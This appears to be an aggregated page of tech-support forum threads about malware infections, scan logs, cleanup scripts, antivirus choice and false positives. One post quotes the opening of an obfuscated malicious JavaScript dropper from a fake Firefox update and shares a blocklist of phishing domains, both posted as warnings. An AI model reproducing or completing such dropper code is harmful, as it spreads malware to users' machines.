Mozilla Firefox (latest version)
XPhome

what a colossal pain in the backside....

Answer:"security alerts" "malware detection" and other junk

Try the guide at http://www.bleepingcomputer.com/virus-remo...malware-defense
Let me know your results

13 more replies
Relevance 79.13%

hi everyone,
the past months it has happened twice that someone got access to my facebook account also after changing my password.
it didn't feel safe so I followed the procedures as written in the removal sections.
openly.. yes.. I'm guilty of having used software downloaded by p2p networks as has someone who rented my house and pc for a year or so. I always used the ones 'verified' or very positively commented on but maybe this has been the most naive.. :-o
I uninstalled and deleted all from my system still it doesn't solve the issues..
I read the warnings in this section so I understand if help will not be given.
would someone still be prepared to do so I have some remarks with the tests.

-after the rogue killer scan a ssdt hook info appeared
-during the mbam scan avira came with a warning that adware screening had been blocked.

my humble thanks to anyone who would like to give me a helping hand to solve this..
 

Answer:malware help needed after detection of 'stolen' passwords

Please download OTM by Old Timer and save it to your Desktop.

Run OTM.exe by double clicking on it (Note: if using Vista, Win7 or Win8, don't double click, use right click and select Run As Administrator).
Copy the lines from the below codebox to the clipboard by highlighting ALL of them and pressing CTRL + C
(or, after highlighting, right-click and choose Copy): Do not include the word Code: which is just a title line of
the code box

Code:

:Processes
explorer.exe


:Services
APNMCP
gupdate
gupdate

:Files
C:\Program Files\AskPartnerNetwork
C:\Program Files\Movies Toolbar
C:\Program Files\Mozilla Firefox\browser\searchplugins\Ask.xml
C:\Program Files\VNT\
C:\ProgramData\APN
C:\ProgramData\AskPartnerNetwork
C:\Users\gebruiker\AppData\Local\VNT\
C:\Users\gebruiker\AppData\Roaming\Mozilla\Firefox\Profiles\hyc6xoox.default\searchplugins\Ask.xml
C:\Users\gebruiker\AppData\Local\WebPlayer\FLV Player\scripts\web_player\web_player.js
C:\Users\gebruiker\AppData\Roaming\Mozilla\Firefox\Profiles\hyc6xoox.default\searchplugins\babylon.xml
C:\Users\gebruiker\AppData\Roaming\Mozilla\Firefox\Profiles\hyc6xoox.default\searchplugins\delta.xml
C:\ProgramData\Wincert
C:\Program Files\Movies Toolbar\SafetyNut
C:\Users\gebruiker\AppData\Roaming\Search Protection
c:\program files\common files\spigot
C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3979874650-15... Read more

3 more replies
Relevance 79.13%

Earlier on today my computer locked up, I rebooted and had trouble logging in(wouldn't show the username/password), finally rebooting a couple more times I got into Windows and checked out the proceses and b.exe was there.

I've tried running malwarebytes anti-malware, super anti spyware, combofix and none of them will open. The only other thing it's really doing is redirecting google searches.

here is the DDS log

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\WgaTray.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Internet Explorer\Iexplore.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\WINDOWS\system32\Rundll32.exe
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\WINDOWS\msb.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Messenger\msmsgs.exe
svchost.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\... Read more

Answer:google redirects, can't run any malware detection programs

Hi,

I will handle your log. As I am in training all my answers have to be approved by my Coaches.
I hope you understand.

I'll get back to you as soon as is possible.

6 more replies
Relevance 79.13%

My fiancee's aunt and uncle are raising a 17 year old grandson who is famous for infecting their computer (which gets handed to me to fix). They are usually NASTY viruses which require me to seek help on the internet for. No doubt the result of him going to pornographic sites as I notice he erases the browser history quite religiously. (I've been through this with my own teenage son and a teenage stepson as well!)

At any rate this one really takes the cake. Not only did I clean a horrific virus off their computer last time but installed McAfee AV (I told them to get the internet security suite but all they got was the AV) cleaned the computer with malware bytes (but uninstalled this program after using it), AdAware, and Spybot S&D (left those two on the system and showed them how to use them, not that they did), got all the Windows updates loaded, and set up their system for automatic updates and scans.

Now I get it back no more than 2 months later like this.....

Upon boot up there is immediate windows security alerts which tells me the computer is infected and would I like to start my anti-virus program now? I ignored those. Meanwhile error messages are popping up one after another telling me that every file in creation is infected with a virus (including files associated with running McAfee).

Attempting to open McAfee up directly (by-passing the "click here" baloney) with this mess going on does nothing but earn me more error messages regarding... Read more

Answer:Nasty malware infection evades all detection

I used this post earlier. At the current time I am a huge fan of rkill, due to it seems to give you a much better working environment for detection and removal.

Just to be clear first and foremost. I'm not a regular technician on this forum, but I think this may be of some assistance.

If you have a secondary computer to download programs through put them on a flash drive and transfer them.

First you should download rkill from a known good source.
While downloading just to be safe, you may want to rename the files from something other than rkill.
http://download.bleepingcomputer.com/grinler/rkill.com
http://download.bleepingcomputer.com/grinler/rkill.exe
http://download.bleepingcomputer.com/grinler/rkill.pif
http://download.bleepingcomputer.com/grinler/rkill.scr

You will also want to download Malwarebytes from a known good source.
I would just use http://www.malwarebytes.org/

When running rkill on Windows 7 or Vista you will need to right click and use the "run as administrator" option.
Try running rkill a few times, the DOS box should pop up saying it is terminating known malware processes.
If the exe does not work, try the com version, but make sure to run as Administrator.
Once rkill successfully runs, a notepad file should open up with what it stopped.
Now, don't restart the computer.
Remove Malwarebytes if it's installed, and reinstall it.
Update to the latest definitions.
To be on the safe side I would suggest running a full system scan.
Any entries it finds, remove them.
At... Read more

6 more replies
Relevance 79.13%

Hi, I seem to be having some issues on my PC after my previous anti virus, Kaspersky 7.0, detected an infection of some sort and apparently removed it; however, after this issue Kaspersky was unable to update, so I uninstalled it because I wasn't really liking it and I installed ESET Nod32 which found no threats but the next day it couldn't update either. That same day a scheduled Windows update came up with a prompt stating that it was unable to update and Windows Defender did the same. Also the home page on my IE is Google but it seems different in the sense that when I click on any link in Google a new page is opened and sometimes it's a completely different page than whatever I was searching for on Google, often an unsafe site that opens up multiple other pages. This doesn't happen with every link and clicking the same link afterwards will usually go to the page I was expecting. This seems to me like an obvious malware problem but it seems so random. Also, and I'm not sure if this is related, but my PC has 6 USB slots and two of them are USB 1.0 while four are USB 2.0; however, one of the 2.0 ones today wasn't reading the printer attached to it and when I switched it with a PSP the device was recognized but a prompt came up stating that the device might work slowly because it was designed for a 2.0 slot. I have connected the PSP to this slot before and it was instantly recognized by what I believe to have been, until today, a USB 2.0 slot. I don't know if this is related to the other ... Read more

Answer:Seemingly unrelated issues after malware detection

bump, please

1 more replies
Relevance 79.13%

Hello everybody!
My security software (Bitdefender Internet Security 2014) detected a virus inside the .exe file of JRT (Virus Name: MIDAS3) and removed it from my system immediately.
Virus Total report also shows some malware detection coming from other AV software.
BIS 2014 usually doesn't make blunders from this point of view, since it's known to have a very low FP rate detection. What do you make of it, dudes?
It's strange because previous JRT versions never gave me any trouble, meaning they were always clean.
It would be great if someone of you could report my comment to the JRT developer, in order to clear up this issue once and for all.
 
Thanks in advance.
 
 

Answer:Junkware Removal Tool (JRT) malware detection!!

It's obviously false positive.
Report it at BIS forum.

2 more replies
Relevance 78.31%

I've learned about the vulnerabilities of downloads, so I've been scanning new downloads, especially with VirusTotal scan. When you see one or two or three hits, how do you know whether this is one or a few services picking up a real malware item most are missing, or whether it is another example of the unquestionably large phenomenon of false positive detections?

I know Nir's items like WebBrowserPassView are not malware. I know when ClamAV is the only malware detector on the list, it's likely false positive. I know now, from ClamAV's own forum, that PUAs are probably false positives.

I downloaded AppRemover and when doing the VT scan, it got hits from TrendMicro-HouseCall--"TROJ_GEN.F47V0414" and Symantec--"WS.Reputation.1" I have read that Norton is especially bad at labelling good products malware. I don't know about TrendMicro.

I have learned some things, but clearly there's so much more to know. Where does one read up and learn about this?
 

Answer:What can we do about distinguishing true malware detection & false positives?

Use common sense, if it's flagged, it's for a reason; Nir Sofer's tools, and some by Mark Russinovich, have been used by hackers in the past.

I'm really not sure where the 'best' place is to learn about these things, most A/V companies are pretty vague about details (some tend towards scaremongering in my book).

Most A/V's use some kind of 'predictive' heuristics/reputation algorithm - basically, it guesses based on previous records/reports etc.

Firstly, explore and study all the options in Virustotal; More details, Additional information and Comments, if there are any.

As an example, when there are a high number of A/V's flagging a file as 'gen', 'like ... ', 'pupack', 'pack', 'heuristic', 'suspicious', etc. but few or none with a definitive virus/malware label, it may be a benign file packaged by a tool that has been used by hackers to compress their malware.

The below file when unzipped contained 3 files, only one of those was flagged - by only one A/V - and that was a 'gen' detection. *Better to be safe than lose your ID/Paypal etc. though - if in doubt - don't touch it!
 

1 more replies
Relevance 78.31%

Hey folks,
 
As the title states I ran a routine AVG scan today and at around the 45% mark it came up with 11 detections, then a pop up immediately appeared saying Windows would shut down in one minute and I should close all programs. The PC then froze forcing me to do a manual hard reset. I've run Malwarebytes and that completed but showed nothing amiss. I've also tried re-installing AVG using a random name for the exe file. This made no difference and the same thing occurred - 11 file detections, warning, freeze. The only thing I've done recently that's out of the ordinary is install Geforce Experience (basically a graphic driver updater) manually after the auto-update failed and appeared to damage the program. This appeared to be as expected. I'm running Windows 10, fully updated. I'm now at a bit of a loss as to how to proceed so any advice would be useful. Thanks

Answer:Windows 10 forced shutdown on malware/virus detection

Just an update. I managed to get Avast (Free) anti virus to install using a completely random name for the exe file. It turned up nothing when I ran it (although I'm not convinced it's the best anti-virus out there so still not convinced I've got a clean bill of health). I also installed Spybot and that came up clean apart from the usual cookies and core registry files it likes to be rid of.

0 more replies
Relevance 78.31%

Vista Ult. 32-bit, core2 2ghz proc, 2GB ram.
With all antivirus/etc uninstalled and rebooted,

dds.scr initially runs but does not scan or produce logs even after 10 minutes and locks up the machine.

Arc.txt log is 3.87MB and will not attach because it's too big, yes it is a txt file.

aswMBR.txt is attached.

Please advise,
Doug

Answer:Unknown Virus/Malware Defies Detection/Removal

Hello and welcome to Bleeping Computer.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine.

If you are unable to create a log because your computer cannot start up successfully please provide detailed information about the Windows version you are using: What we in particular need to know is version, edition and if it is a 32bit or a 64bit system. If you are unsure about any of these characteristics, just let us know and we'll help you figure it out. Please also tell us if you have your Windows CD/DVD handy.

Please include a clear description of the problems you're having, along with any steps you may have performed so far.

Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.

Even if you have already provided information about y... Read more

2 more replies
Relevance 78.31%

http://pcsl.r.worldssl.net/report/android/pcsl_android_malware_detection_201411_en.pdf
 

Answer:PCSL: Android Malware Detection Test 2014 Nov.

I just got a 6 months free key of Bitdefender Mobile Security. Thanks to malwaretips, I don't have to pay for security software for the next 1 year. Though I have very bad luck when it comes to giveaways, some cool members of malwaretips always help me with the keys.
 

1 more replies
Relevance 78.31%

Avast constantly shows the following pop up detection messages
 
Malware blocked
 
infection : win32:malware-gen
 
and
 
infection : win32:trojan-gen
 
Threat was detected and blocked when file was created or modified
 
Have run full system and boot time scan: infections were found and removed but message continues to pop up
 
Please help.
 
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16421  BrowserJavaVersion: 10.17.2
Run by owner at 20:41:56 on 2013-03-27
Microsoft Windows 7 Home Premium   6.1.7600.0.1252.44.1033.18.3999.2394 [GMT 0:00]
.
AV: avast! Antivirus *Enabled/Updated* {2B2D1395-420B-D5C9-657E-930FE358FC3C}
SP: avast! Antivirus *Enabled/Updated* {904CF271-6431-DA47-5FCE-A87D98DFB681}
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_ccf0dd3cb081af84\STacSV64.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
C:\Windows\system32\Dwm.ex... Read more

Answer:Avast constant detection message - Malware Blocked

Hi and Welcome!!

My name is Jeff. I would be more than happy to take a look at your malware results logs and help you with solving any malware problems you might have. Logs can take a while to research, so please be patient and know that I am working hard to get you a clean and functional system back in your hands. I'd be grateful if you would note the following:
The fixes are specific to your problem and should only be used for the issues on this machine.
It's often worth reading through these instructions and printing them for ease of reference.
If you don't know or understand something, please don't hesitate to say or ask!! It's better to be sure and safe than sorry.
Please reply to this thread. Do not start a new topic.
If you happen to have a flash drive/thumb drive please have that ready in the event that we need to use it.
Please be sure to subscribe to this topic so that you can see when there are new responses.
IMPORTANT NOTE: Please do not delete, download or install anything unless instructed to do so.
DO NOT use any TOOLS such as Combofix or HijackThis fixes without supervision. Doing so could make your system inoperable and could require a full reinstall of your operating system and losing all your programs and data.

Having said that.... Let's get going!!


Please download aswMBR to your desktop.
Double click the aswMBR icon to run it.
Click the Scan button to start scan.
If you are asked to update the Avast Virus database please allow it to do so.
When it finishes, p... Read more

18 more replies
Relevance 78.31%

Ran a MBAM scan when I seemingly downloaded a dubious file. Result was a Malware.Packer.CV and Norton power eraser found a file in System 32 it was unable to delete.
 
The file it found was wqlhlnn.sys
 
Help is much appreciated at the earliest.
 
EDIT: I haven't launched the .exe file the malware was found in when it got detected.

Answer:Malware Packer and detection by Norton Power Eraser

Can you post the entire file location path?
 
Reason I ask is you can boot into safe mode and paste the entire file location into File Assassin it should delete it.
https://www.malwarebytes.org/fileassassin/

12 more replies
Relevance 78.31%

I just want to hear others thoughts on this subject. I have read a couple of articles that state the possibility of Anti Virus software providing and cleaning viruses that were never there just to appear to be doing its job. I personally think that is a stretch. I mean what development company has time to provide for this kinda functionality?

Anyway, What do you think??
 

Answer:False Hits on Virus and Malware detection software

6 more replies
Relevance 78.31%

Dear friends,
We all consider MBAM as a Holy cow and mostly accept its results! I have been having doubts since, say, one year that MBAM may be missing what a-squared free and Digital Patrol are catching. Today, I visited the Malwarebytes forum and was aghast at the huge collection of malware missed by it. In the discussion that ensued there, one of the "experts" said that only new threats are included in the database and that can be the cause of the whole miss! Finally the Moderator agreed to check out the 117 mb of missed malware presented by the @op! I am providing a link for perusal: http://forums.malwarebytes.org/index.php?showtopic=50460
 

Answer:Detection abilities of mbam(malwarebytes anti-malware)?

9 more replies
Relevance 77.49%

What would be the best software to meet these requirements for servers and clients running Windows 2003/XP/Vista:
Antivirus
Spyware Detection
Malware Detection
Adware Detection
Small System Footprint on space and resources
Updates sent from Server to all clients
Controlled by server
Integration with Microsoft Exchange
Please give me your best suggestions, thanks.
 

Answer:Best network Virus/Spyware/Malware/Adware Detection/Removal

Kaspersky or ESET's NOD32. They both produce enterprise versions and have optional Exchange server modules.
 

10 more replies
Relevance 76.67%

I've got a really strange problem, that makes it really difficult to post any diagnostic information about the problem. I've tried running HiJackThis, MalwareBytes anti-malware, Trendnet housecall online scanner, GMER, ad-aware, Spybot S&D, RootRepeal and dds.scr. The results are pretty much the same for all of these programs. The scan/analysis starts, sometimes it gets partway through scanning, and then the application window gets closed. After this happens, in the case of .exe files, the resulting program is rendered useless, in that further attempts to launch it result in a "Windows cannot access the specified device, path or file. You may not have the appropriate permissions to access the item." and you also cannot rename, or delete the file.

Trend-net housecall is also pretty interesting, in that it runs inside the browser, and after it was terminated (part way through the scan) iexplore.exe now exhibits the same error in not being able to launch. This not being able to launch persists across reboots also. I then installed firefox.exe on the system, was using it for a brief period, tried trend-net housecall and now it too is showing the error in not being able to launch.

dds.scr is able to be re-launched, and it brings up the black command window type screen, but never brings up the notepad windows. It seems unaffected by the termination behaviour, and is able to be re-launched.

I was able to run A2 anti-trojan, and do have a log of what it... Read more

Answer:Strange malware issue - unable to use detection tools or virus scanners

Hi Thomas Lovie,

Welcome to BC HijackThis forum. I am farbar. I am going to assist you with your problem.

Please refrain from making any changes to your system (updating Windows, installing applications, removing files, etc.) from now on as it might prolong handling your log and make the job for both of us more difficult.

I share your academic interest. So let's have a go at it.

Download and run Win32kDiag:
Download Win32kDiag from any of the following locations and save it to your Desktop.
Download Win32kDiag (Win32kDiag.exe) - #1
Download Win32kDiag (Win32kDiag.exe) - #2
Download Win32kDiag (Win32kDiag.exe) - #3
Double-click Win32kDiag.exe to run Win32kDiag and let it finish.
When it states "Finished! Press any key to exit...", press any key on your keyboard to close the program.
Double-click on the Win32kDiag.txt file that is located on your Desktop and post the entire contents of that log as a reply to this topic.

Next......

Also post the A2 anti-trojan log.

30 more replies
Relevance 70.93%

A while back, I was able to download and install a list of websites that should be blocked (ie porn, spyware sites) right into IE6. I can not for the life of me find what it was called.

Does anyone know, or know of something similar? I would like to block sites from being accessed (without using parental controls if possible).

Thank you!
Erin
 

Answer:Blacklist for websites in IE?

spyware blaster does some of what you want.

SpywareBlaster 3.3
 

2 more replies
Relevance 70.52%

In September 2016, we started adding to Microsoft Malicious Software Removal Tool (MSRT) a malware suite of browser modifiers and other Trojans installed by software bundlers. We documented how the malware in this group install other malware or applications silently, without your consent. This behavior ticks boxes in the evaluation criteria that Microsoft Malware Protection Center (MMPC) uses for identifying unwanted software. Installing software without your permission, interaction, or consent is considered unwanted behavior because that can take away the choice you should have in determining what applications to install on your computer.

By October 2016, MSRT detected and removed most of the malware families in this suite:
Sasquor, which changes browser search and homepage settings to circumvent the browser's supported methods and bypass your consent, and can install other malware like Xadupi and Suweezy
SupTab, which also changes browser search and homepage settings, and installs services and scheduled tasks that regularly install additional malware
Suweezy, which attempts to modify settings for various antivirus software, including Windows Defender, creating a significant danger to your computer's overall security
Xadupi, which registers a service that regularly installs other apps, including Ghokswa and SupTab, and is ostensibly an update service for an app that has some user-facing functionality: CornerSunshine displays weather information on the taskbar, WinZipp... Read more

More replies
Relevance 69.7%

AVG has for the 2nd time reported malware found in the destination relative to Google Update and Google Talk.

Until resolved, these programs have been firewalled.

Also, I think my network is being infiltrated where users can remotely see my screen activity.

1st the malware issue
then 2nd the network issue

Answer:Malware detection in Google Update and Google Talk

Hi-

For Malware issues you should head over to the security section:

Please follow these instructions in your post: http://www.techsupportforum.com/f50/...lp-305963.html

Once they clear your system you may return here for any further questions/ support. Please note that the security section is extremely busy and it may take some time before they can get to your post. You may post the information gathered in these steps here: http://www.techsupportforum.com/f50/

Regards,

Mark

2 more replies
Relevance 68.47%

Hello everyone,

I have a young teenager and every attempt that I have tried to block adult websites from them has failed. I want to know if there is a program out there that can block/blacklist any and all adult websites from the web browsers that we use. We use IE and FireFox. This is a big concern for me, due to the fact that it's not appropriate for them to see.

Any help with this subject would be GREATLY appreciated.

Oh....I am using Windows XP Home Edition SP2.

Thank You.
 

Answer:Wanting to block/blacklist all adult websites

8 more replies
Relevance 67.65%

Sharing this here in case anyone is interested in adding a Black List to their Firefox to block trouble spots on the internet from ever being navigated to from Firefox.

I added BlockSite add-on to my Firefox browsers on my systems and created a short blacklist that I am going to build up and add to.

Here is the add-on I am using that works well. Easy to set up and manage: https://addons.mozilla.org/en-US/firefox/addon/blocksite/

Here is my current black list:

[BlockSite]
*eekumyoutube*
*meihitravelfeeder*
*liirawynagrodzenia*
*eatadresumedropbox*

I started use of this BlockSite add-on because some computers both at home and elsewhere have had Phishing Attacks trying to get people to download and run a firefox-update.js ranging in sizes of ( 6.5kb, 338kb, and 482kb ). Screenshot below shows an example of this Phishing Attack.

Worst of all is that MalwareBytes Free edition, Microsoft Security Essentials, and McAfee Free edition all say that these .js files are safe, no problems detected. Yet looking at the source code in the script it has malicious intent to infect Firefox.

Here is a code snippet from a 6.5kb fake firefox update:

Code:
var lubjgros=odubo+lni+ksfyw+fivu+cqe+asq;
   function loa(a){return a;};
   var rrr="ev";
   var sir="Scr"+"ipt"+"ing."+loa("Di"+"ct"+loa("i"+"o"+"n"+"a"+"r"+"y"));
   va... Read more

Answer:Black List to Block Websites - Firefox - Please add others to blacklist

Here is the latest blacklist I have if anyone is using the BlockSite Addon:

Just copy and paste this below into a text file and import it to the Block Site Addon... These are Firefox Fake Update Phishing sites that have been found, and the phishing seems to originate through facebook somehow. Computer shows clean with malwarebytes and avg virus scan.

Code:
[BlockSite]
*eekumyoutube.*,Phishing Attacker
*meihitravelfeeder.*,Phishing Attacker
*liirawynagrodzenia.*,Phishing Attacker
*eatadresumedropbox*,Phishing Attacker
*phaigfinancial-hub.*,Phishing Attacker
*vooshortakweb.*,phishing attack
*ijualhalfpintgentleman.*,phishing attack
*nuriuek-online.*,phishing attack

3 more replies
Relevance 63.96%
Question: Detection

Hi, a small business I do IT work for was hit with a Crypto virus zendrz file. It's now removed and all data restored. I'm just wondering, what's the best AV or tool to detect and stop these infections before they get on to the system?

Answer:Detection

The best defensive strategy to protect yourself from malware and ransomware (crypto malware) infections is a comprehensive approach. Make sure you are running an updated anti-virus and anti-malware product, update all vulnerable software, use supplemental security tools with anti-exploitation features capable of stopping (preventing) infection before it can cause any damage, close RDP if you do not need it, use secure passwords and routinely backup your data...then disconnect the external drive when the backup is completed.

If you must use RDP, the best way to secure it is to either whitelist IP's on a firewall or not expose it to the Internet. Put RDP behind a firewall, only allow RDP from local traffic, setup a VPN to the firewall and enforce strong password policies, especially on any admin accounts or those with RDP privileges.

Use an Anti-Exploit Program to Help Protect Your PC From Zero-Day Attacks
The smartest way to stay unaffected by ransomware? Backup!

For more suggestions to protect yourself from ransomware infections, see my comments (Post #2) in this topic...Ransomware Avoidance.

BTW...The .zendrz extension appended to the end of the encrypted data filename is a variant of Globe Ransomware which typically leaves files (ransom notes) named How to restore files.hta, Important Information.hta.

There is an ongoing discussion in this topic where you can post comments, ask questions and seek further assistance. Other victims have been directed there to share information, ex... Read more

more replies
Relevance 63.96%
Question: IP detection

I have purchased an IdeaPad U310, and I have trouble when I change the place where I connect to a wireless network.
In my office I must input the IP every time; in my house I can't connect to my wireless network and I must change the configuration again.
What can I do to solve this?

Configuración IP de Windows

Nombre de host. . . . . . . . . : usuario-PC
Sufijo DNS principal . . . . . :
Tipo de nodo. . . . . . . . . . : híbrido
Enrutamiento IP habilitado. . . : no
Proxy WINS habilitado . . . . . : no
Lista de búsqueda de sufijos DNS: interno.rqc.com

Adaptador de Ethernet Conexión de área local:

Estado de los medios. . . . . . . . . . . : medios desconectados
Sufijo DNS específico para la conexión. . :
Descripción . . . . . . . . . . . . . . . : Realtek PCIe FE Family Controller
Dirección física. . . . . . . . . . . . . : 04-7D-7B-B7-9C-98
DHCP habilitado . . . . . . . . . . . . . : sí
Configuración automática habilitada . . . : sí

Adaptador de LAN inalámbrica Conexión de red inalámbrica:

Sufijo DNS específico para la conexión. . : interno.rqc.com
Descripción . . . . . . . . . . . . . . . : Atheros AR9485WB-EG Wireless Network Adapter
Dirección física. . . . . . . . . . . . . : 20-16-D8-7F-E5-96
DHCP habilitado . . . . . . . . . . . . . : sí
Configuración automática habilitada . . . : sí
Vínculo: dirección IPv6 local. . . : fe80::e03f:b607:125b:db55%13(Preferido)
Dirección IPv4. . . . . . . . . . . . . . : 192.168.0.75(Preferido)
Máscara d... Read more

Answer:IP detection

Please do not report your post. It is also mentioned in the report screen:
Please use this form ONLY to request a Moderator in case of a problem. Reasons can include: requesting a thread be moved or closed, report advertising messages, and problematic (harassment, fighting, or rude) posts. This is not a method of requesting technical assistance! Thanks!

I have moved your thread to a post of its own - this avoids confusion with trying to deal with two problems for two different users
 

1 more replies
Relevance 63.96%
Question: ram detection

I have a Wipro PC that is dual core, Windows XP Starter Edition, 1 GB RAM. The BIOS detects 1024 MB of RAM but Windows says it's only 512 MB. What happened to the remaining 512 MB? Please help

Answer:ram detection

as it been associated with your video card by the bios

1 more replies
Relevance 63.96%
Question: PUP detection

In certain reviews it's been pointed out that PUP detection is weak in Qihoo. What do you think?
 

Answer:PUP detection

Good joke
Qihoo is one of the best in detection (reviews are based on personal opinion and not all people like software from china, are fair with some products ... watch Softpedia and other untrusted sites)
 

5 more replies
Relevance 63.96%

An alarming trend seems to be showing up in a lot of security suites. Detection of zero-day threats is at an all time low. A zero-day threat is a piece of malware that is new enough that it has not yet been detected by an anti-malware company and thus they do not have a signature for it. Several high profile antivirus and anti-malware suites have failed this portion of testing ever since it was implemented in the Malware Geek standard test in September. The group includes Symantec's Norton Internet Security, McAfee Internet Security, avast! Antivirus, Avira Antivirus, Sunbelt's Vipre Internet Security, Dr. Web Security Space Pro, and Webroot SecureAnywhere. What is up? All of these well known and well respected security suites are lagging behind the times and are falling victim to unknown, silent malware. You would think that these well known companies would surely have some sort of protection for those threats that they do not have a signature for. However, it is exactly the opposite. Are they just waiting for a bigger and more destructive piece of malware to come along before they do something about it? With hundreds of new pieces of malware released on a daily basis, you CANNOT rely solely upon signatures to catch everything.

http://malware-geek.blogspot.com/2011/11/zero-day-detection-where-is-it.html
 

Answer:Zero-Day Detection . . . . Where is it?

Why are you getting your information from Malware Geek?
 

6 more replies
Relevance 63.96%
Question: SSL VPN detection

Ok, all you pro security nuts. How/(can) do you handle detecting SSL VPNs? For instance, using my SSL Explorer setup here at the house, I can easily punch a hole right through any proxy I've tried, allowing me to say browse the net unfiltered, upload files, download files, even create a bridged vpn connecting both networks. On one hand SSL VPNs are great for businesses to allow them to secure access to internal resources easily, but when turned around they pose a security nightmare because the traffic is inherently trusted. All you need is a browser and possibly java.

I've only thought of 2 solutions. First, a snort rule that looks for an abnormally large amount of traffic via a 443 session. The problem here is that you're only able to catch it after the fact, and after X amount of data has already been transmitted. Only a few KB would be needed to say infect the host, so this isn't a good solution. Another that would work against my situation would be to look for unsigned certificates. Not even sure how to go about that, but I'll bet some way exists to do this on the fly. But then again, if I wanted to spend $30, I'm in the clear again. The other thing already in place is black listing, however, homebrews are not by nature, so again, fail.

Thoughts?
 

Answer:SSL VPN detection

just block all 443 traffic!

Seriously, I'll have to try that through an astaro box. I have used Astaro to successfully block anonymous web proxies and LogMeIn/GoToMyPC, etc. I haven't specifically tried an SSL VPN yet.
 

19 more replies
Relevance 63.96%
Question: HD Detection

Hi Guys.. A week ago bought a new 'Maxtor 250 Gig 7200rpm 16 mb cache' and have been trying to get com to recognise since then. This is how it goes.. Original setup . 2 x 120 Seagate Barracudas SATA.. 1 x 200 Gig WD. (Eide) those have been running fine for quite a while.. The Maxtor is also an Eide. I won't bore you with the details of getting it formatted other than using a Maxtor Diagnostic disk to achieve it. The problem is that it will recognise now and again and sometimes it will be listed in bios but when I continue to boot it disappears again. I have tried as Master as a single Eide (with the 2 sata's OS) and it's just a hit or miss affair if it is recognised. On Friday I managed all 4 being recognised but after a while the Maxtor disappeared then on reboot the WD goes as well. Have tried the master/Slave combinations, all Jumper combinations. First boot recognition (eide) all these processes have the same effect, there they are, there they are gone. At one stage I did manage to drag some data across onto the Maxtor and all OK as far as that goes. Have run Diagnostic test again and it did find errors and was able to fix, (And on some occasions it could not find the drive at all although it was there prior to reboot). As far as I can see BIOS is up to date as board only 12 months old if that. So I have basically run out of ideas, any suggestions gratefully received.. Now whether this has anything to do with it I really don't know as it was there before I ... Read more

Answer:HD Detection

Have you tried another IDE cable? Have you verified all of the BIOS settings or cleared CMOS?
 

15 more replies
Relevance 63.96%
Question: no ide detection

OK, I know there is a hard drive in my computer, but when it boots up and I go into BIOS, I try to detect it but it's not there. It detects the CD burner when it's hooked up to the same place as the hard drive was, with the same cord also. It will detect CD burners and stuff but not hard drives. I've also tried different hard drives. Also when I let it boot up it says no boot record on IDE, CD, or floppy even though a Mandrake 10.1 install CD is in the CD drive.
Do I have to do something to make it detect the Mandrake CD? It's searching for the boot record so maybe it doesn't want to see Mandrake. But any help would be useful.
Thanks.
 

Answer:no ide detection

Your IDE controller may be going bad. That is if you have actually set the jumpers on the hard drive correctly, honour the plug order for 80-wire cable and have set the computer to actually try to boot from the CD or floppy.

You should try with another bootable CD too in case the one you have is bad.
 

6 more replies
Relevance 63.96%

Hello,

I've installed ATA Center 1.7.2 and Ata Lightweight Gateway on my DC.
Everything installed correctly, I don't find any errors in both gateway and ata center logs.

The problem I have is that I can't seem to get any alerts. I've tried both logging in with one honeycomb account and listing a DNS zone.
In the database I don't have any NTLM events.
Can someone help me?

Thank you

More replies
Relevance 63.96%
Question: AV Detection

In PCMAG tests, sometimes tester tests the detected samples modifying them. And most of the AVs couldn't detect all modified samples. Guess this means those AVs are not flexible.

Some AVs could detect all the modified samples. Guess those AVs are flexible & good.

I read Bitdefender free review & it detected all the modified samples.
Fsecure couldn't detect all the modified samples.

He doesn't perform the modified samples test in all the reviews, don't know why?

Which are the AVs that are flexible & detect the modified samples the same as the original?
 

Answer:AV Detection

Hello,

The reason a security product may not have detected a sample after modification is because it may have detected the sample via a hash checksum like MD5, SHA1 or SHA256. When the bytes in the executable are changed, the hash checksum will also change. Therefore, the vendor may have a signature for a sample, but then the sample modification will cause the hash checksum to change. If the vendor does not have that new hash checksum in their database for the modified copy, then it will not detect the sample.

BitDefender (as an example) may have detected the sample after modification because they had generic detections for those samples. For example, HEX. HEX detection (included for generic detection/heuristics) is where the bytes in the executable (or file, not just executable) are scanned. The product will look for a pattern in the bytes which it can detect and classify as a certain threat.

